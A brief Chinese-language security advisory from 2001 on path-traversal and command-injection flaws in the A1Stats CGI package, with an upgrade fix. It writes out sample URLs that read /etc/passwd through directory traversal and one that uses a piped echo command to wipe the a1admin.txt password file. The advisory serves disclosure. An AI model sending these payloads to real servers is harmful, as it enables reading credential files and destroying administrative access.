积极预防 及时发现
快速响应 力保恢复
A1Stats CGI程序导致WEB服务器多个漏洞(APP,缺陷)
发布时间:2001-05-09 信息来源:管理员

涉及程序: A1Stats 详细: A1Stats ( http://www.gadnet.com/a1stats ) 是一款 CGI 程序包,今天发现它存在多个漏洞。攻击者对受影响的 WEB 服务器提交特殊的 HTTP 请求能浏览 WEB 根目录之外的文件,甚至重写服务器上的文件 www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt 这将会清空 a1admin.txt 文件。而该文件包含改变 CGI 设置的口令,当该文件被移去后,将无人能登录。 受影响系统: 2001年4月24日之前的所有 A1Stats 解决方案: 请用户下载最新版本的 A1Stats:http://www.gadnet.com/a1stats